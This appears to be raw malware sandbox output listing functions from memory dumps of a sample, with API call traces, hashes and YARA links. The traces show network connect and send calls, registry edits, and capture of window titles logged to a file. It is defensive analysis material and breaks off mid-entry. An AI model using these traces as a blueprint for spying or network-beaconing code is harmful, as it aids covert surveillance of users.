                                                                                                                            • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0362A8C1,?,?), ref: 0362DA43
                                                                                                                            • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0362A8C1,?,?), ref: 0362DA62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: f52d2ad2d8f765ff33e29e2bf8f09986b005f5a617263ff52aaf5853429f6fd5
                                                                                                                            • Instruction ID: 4685bdb6d987e54af2bf88c5850f3a3601255bca6cd12fe779760cbaa47bb546
                                                                                                                            • Opcode Fuzzy Hash: f52d2ad2d8f765ff33e29e2bf8f09986b005f5a617263ff52aaf5853429f6fd5
                                                                                                                            • Instruction Fuzzy Hash: 4C810376B00A149FD720DFA9D984B6ABBE8FB48315F264569F919CB740E7B1E400CF90
                                                                                                                            Function 0362C5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362C63D
                                                                                                                            • _memset.LIBCMT ref: 0362C64C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0362C66F
                                                                                                                              • Part of subcall function 0362C81E: RegCloseKey.ADVAPI32(80000000,0362C7FA), ref: 0362C82B
                                                                                                                              • Part of subcall function 0362C81E: RegCloseKey.ADVAPI32(00000000), ref: 0362C834
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close_memset$Open
                                                                                                                            • String ID: %08X
                                                                                                                            • API String ID: 4292648718-3773563069
                                                                                                                            • Opcode ID: 8cfccf9e85a6187e14f49561aaa386498d87cfa8dd424d427c33101a43a20485
                                                                                                                            • Instruction ID: 10a539c343198c7370bd843c46c335f7f552b976d531883c5a66eddd0381f067
                                                                                                                            • Opcode Fuzzy Hash: 8cfccf9e85a6187e14f49561aaa386498d87cfa8dd424d427c33101a43a20485
                                                                                                                            • Instruction Fuzzy Hash: 1E516FB6A00618ABDB24EF50CC99FEEBB78EB44704F405599F705AB180D774AB44CFA4
                                                                                                                            Function 02C336F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 02C33710
                                                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C33749
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C33766
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C33779
                                                                                                                            • WSACreateEvent.WS2_32 ref: 02C3377B
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C4D990), ref: 02C3378D
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C4D990), ref: 02C33799
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C4D990), ref: 02C337B8
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C4D990), ref: 02C337C4
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 02C337D2
                                                                                                                            • htons.WS2_32(?), ref: 02C337F8
                                                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 02C33816
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02C3382B
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C4D990), ref: 02C3383A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1455939504-0
                                                                                                                            • Opcode ID: 51a33f780997ab5bf0f058aaf7a812f7bc205fd96aeea0c054f999f3fc7f699d
                                                                                                                            • Instruction ID: 5aba3484aed30c5de9c03bb770f652e475d1b46a88df61ed35362824f3850a36
                                                                                                                            • Opcode Fuzzy Hash: 51a33f780997ab5bf0f058aaf7a812f7bc205fd96aeea0c054f999f3fc7f699d
                                                                                                                            • Instruction Fuzzy Hash: 9E4162B5A40244ABE710DFA4DC49F7FB7B8EF99710F504A19F611A72C0C775A904CBA1
                                                                                                                            Function 036236F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 03623710
                                                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03623749
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03623766
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03623779
                                                                                                                            • WSACreateEvent.WS2_32 ref: 0362377B
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03651F0C), ref: 0362378D
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03651F0C), ref: 03623799
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03651F0C), ref: 036237B8
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03651F0C), ref: 036237C4
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 036237D2
                                                                                                                            • htons.WS2_32(?), ref: 036237F8
                                                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 03623816
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 0362382B
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03651F0C), ref: 0362383A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1455939504-0
                                                                                                                            • Opcode ID: 789f1521f67a04ec6d76471af3b96ed28cb50c56c8d2d8ad8e13f5848a7e1377
                                                                                                                            • Instruction ID: 0009293b9d8bbe182e116ac391d787c97f7a402a5e3a97b0e632fae9868a0f9e
                                                                                                                            • Opcode Fuzzy Hash: 789f1521f67a04ec6d76471af3b96ed28cb50c56c8d2d8ad8e13f5848a7e1377
                                                                                                                            • Instruction Fuzzy Hash: 83417F75A00205ABEB20EBA4DC99F7BBBB8FB48710F214518FB119B2C4D775A800CB60
                                                                                                                            Function 0362AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?,95401134), ref: 0362AA58
                                                                                                                            • wsprintfW.USER32 ref: 0362AA8F
                                                                                                                            • _memset.LIBCMT ref: 0362AAA7
                                                                                                                            • _memset.LIBCMT ref: 0362AABA
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 03628038
                                                                                                                              • Part of subcall function 03628020: _memset.LIBCMT ref: 03628042
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 0362804B
                                                                                                                              • Part of subcall function 03628020: lstrlenW.KERNEL32(?), ref: 03628056
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0362ABBE
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0362AC6E
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362ACAA
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 03629730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,95401134,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E,00000000), ref: 03629773
                                                                                                                              • Part of subcall function 03629730: InitializeCriticalSectionAndSpinCount.KERNEL32(0362E1AE,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629812
                                                                                                                              • Part of subcall function 03629730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0364125B,000000FF,?,0362E04E), ref: 03629850
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                            • API String ID: 1254190970-1225219777
                                                                                                                            • Opcode ID: 47572fdd11e0baed9d6f2ce186f7ea8e6c48423670b275cf322a1cd4622d4cec
                                                                                                                            • Instruction ID: c4e1f5d2597a20a91311a0f517c55f8d1f35ecbf8ddf750ee259e05457b394de
                                                                                                                            • Opcode Fuzzy Hash: 47572fdd11e0baed9d6f2ce186f7ea8e6c48423670b275cf322a1cd4622d4cec
                                                                                                                            • Instruction Fuzzy Hash: A561CFB1A08750AFC360DF64C881EABBBE9BB89714F004A1DF18987240EB759544CFA7
                                                                                                                            Function 0362C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0362C889
                                                                                                                            • RegDeleteValueW.ADVAPI32(?), ref: 0362C894
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362C8A4
                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0362C8C3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0362C8D1
                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0362C8E4
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0362C8F2
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362C900
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                            • String ID: AppEvents$Network
                                                                                                                            • API String ID: 3935456190-3733486940
                                                                                                                            • Opcode ID: 63897ff86ac4306894a41d7a8080fdbe4d315327205c2df12bbfdcd4cd3dee35
                                                                                                                            • Instruction ID: 032b3282b1906a96ccfdefc63509e7df25673838639ce7b30848c1560d77ec8e
                                                                                                                            • Opcode Fuzzy Hash: 63897ff86ac4306894a41d7a8080fdbe4d315327205c2df12bbfdcd4cd3dee35
                                                                                                                            • Instruction Fuzzy Hash: 2E118279E00214FFE720DAA4DD98FABBBACEB05710F204548FB0197244D7719E00D7A4
                                                                                                                            Function 034AA0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1873853019-0
                                                                                                                            • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                            • Instruction ID: 656cca4a060461156cf37969deca2d41ba57d0fa58fa1213cff0a1e8bb7f634e
                                                                                                                            • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                            • Instruction Fuzzy Hash: CA8106B5940700AFE720EF58DC85F6B77A4AF64310F08406AED195F386EB71E914C7AA
                                                                                                                            Function 02C35A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,9426D0E6), ref: 02C35A65
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35B04
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B42
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B67
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35C5F
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C35C80
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35B8C
                                                                                                                              • Part of subcall function 02C31280: __CxxThrowException@8.LIBCMT ref: 02C31290
                                                                                                                              • Part of subcall function 02C31280: DeleteCriticalSection.KERNEL32(00000000,?,02C47E78), ref: 02C312A1
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C35CF1
                                                                                                                            • timeGetTime.WINMM ref: 02C35CF7
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C35D0B
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C35D14
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1400036169-0
                                                                                                                            • Opcode ID: f7cb308ee1a425685500d9d9a6cd698ccf367cc988140c28f260c0268785880b
                                                                                                                            • Instruction ID: a4aa3ef590c8fcd7b565da29ab6acf30ae6885abf777a6b82fe93618c09bdc4d
                                                                                                                            • Opcode Fuzzy Hash: f7cb308ee1a425685500d9d9a6cd698ccf367cc988140c28f260c0268785880b
                                                                                                                            • Instruction Fuzzy Hash: 5BA1F5B0A01A46AFD315DF6AC88479AFBE8FB08344F904A2ED11DC7640D775A964CFD0
                                                                                                                            Function 02C34C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,9426D0E6,?,?,?,?,00000000,000000FF,00000000), ref: 02C34CC6
                                                                                                                            • EnterCriticalSection.KERNEL32(?,9426D0E6,?,?,?,?,00000000,000000FF,00000000), ref: 02C34CED
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C34D01
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C34D08
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2124651672-0
                                                                                                                            • Opcode ID: 36aec2627f1d1569e3a6fc17f6f3c9f8c94ff2572ba7575e5836f596281af61f
                                                                                                                            • Instruction ID: 2ed2ffabff443ac571f8e8db7fbdd8671e023f31ec6ba996f8ab34ebcded564c
                                                                                                                            • Opcode Fuzzy Hash: 36aec2627f1d1569e3a6fc17f6f3c9f8c94ff2572ba7575e5836f596281af61f
                                                                                                                            • Instruction Fuzzy Hash: 6851B07AA046059FC325DFA8E985B6AF7F5FF48710F004A2EE90A87740DB35B814CB91
                                                                                                                            Function 03624CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,95401134,?,?,?,?,00000000,000000FF,00000000), ref: 03624CE6
                                                                                                                            • EnterCriticalSection.KERNEL32(?,95401134,?,?,?,?,00000000,000000FF,00000000), ref: 03624D0D
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03624D21
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03624D28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2124651672-0
                                                                                                                            • Opcode ID: eb6a3e4e2361365ec7e2fd8a56ee3775726360a4c6e1b413a65bde8340b29bf4
                                                                                                                            • Instruction ID: 6676efe83346488732596ac1ba0115e9b9120f3fa8f3fabf6c703647e29fadb1
                                                                                                                            • Opcode Fuzzy Hash: eb6a3e4e2361365ec7e2fd8a56ee3775726360a4c6e1b413a65bde8340b29bf4
                                                                                                                            • Instruction Fuzzy Hash: 0751CF7AA04B148FC315EFA9E484B6ABBF4FF48700F11496EE91A87784DB71A400CF55
                                                                                                                            Function 034ABD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_wcsrchr
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 170005318-2746444292
                                                                                                                            • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                            • Instruction ID: d1689f289851239f479d351c60d6f60f1f1f277deff5cb8a8ff473c6161ff184
                                                                                                                            • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                            • Instruction Fuzzy Hash: B25108B194071C7ADB20EBA5CC85FEB7378DF24700F44459AA70DAE180EB719684CF69
                                                                                                                            Function 0362E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362E751
                                                                                                                            • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0362E759
                                                                                                                            • GetWindowTextW.USER32(00000000,036516F0,00000800), ref: 0362E76F
                                                                                                                            • _memset.LIBCMT ref: 0362E78D
                                                                                                                            • lstrlenW.KERNEL32(036516F0,?,?,?,?,74DF23A0,00000000), ref: 0362E7AC
                                                                                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0362E7BD
                                                                                                                            • wsprintfW.USER32 ref: 0362E804
                                                                                                                              • Part of subcall function 0362E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6BD
                                                                                                                              • Part of subcall function 0362E6B0: CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6D7
                                                                                                                              • Part of subcall function 0362E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362E6F2
                                                                                                                              • Part of subcall function 0362E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0362E6FF
                                                                                                                              • Part of subcall function 0362E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0362E70A
                                                                                                                              • Part of subcall function 0362E6B0: CloseHandle.KERNEL32(00000000), ref: 0362E711
                                                                                                                              • Part of subcall function 0362E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0362E71E
                                                                                                                            • _memset.LIBCMT ref: 0362E820
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                            • String ID: [
                                                                                                                            • API String ID: 2192163267-4056885943
                                                                                                                            • Opcode ID: 5d3dc7f99670fad3b6812652cc2576eebed75902ef26ad59f1a08f8ead74e463
                                                                                                                            • Instruction ID: a122938a26d6ef3279207c5eb198f5f9567455a5ae3d0fc0b2cb6791d3529f88
                                                                                                                            • Opcode Fuzzy Hash: 5d3dc7f99670fad3b6812652cc2576eebed75902ef26ad59f1a08f8ead74e463
                                                                                                                            • Instruction Fuzzy Hash: 1C21E575E00228AACB60EF50DC05BBB77BDFF05700F1485A9F984A6148EE745A95CFE4
                                                                                                                            Function 028855C8 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: !jWW$.$_$i$l${vU_
                                                                                                                            • API String ID: 2102423945-3065862289
                                                                                                                            • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                            • Instruction ID: 210e0eef4d10793b3b6c604a218da7eae3ed28ac62738a6c828c410fdd9796dc
                                                                                                                            • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                            • Instruction Fuzzy Hash: 7F216078A403649FD720EF54CC80FAABBB5FF85700F0481CAE64C9A645DBB19A84CF52
                                                                                                                            Function 03623DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623E05
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623E50
                                                                                                                            • send.WS2_32(?,000000FF,00000000,00000000), ref: 03623E6E
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 03623E81
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03623E94
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EBC
                                                                                                                            • WSAGetLastError.WS2_32(?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EC7
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,0362398D,?,00000000,000000FF,00000000), ref: 03623EDB
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03623F14
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 03623F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1701177279-0
                                                                                                                            • Opcode ID: d9452dc1e97e3283f142f93d7338fc759c74253d04a5a7a497979716add5d0bd
                                                                                                                            • Instruction ID: 23c9bde40c7303334066c4a28ba8a80952739d53f6bc5a735a065b2e284e7d36
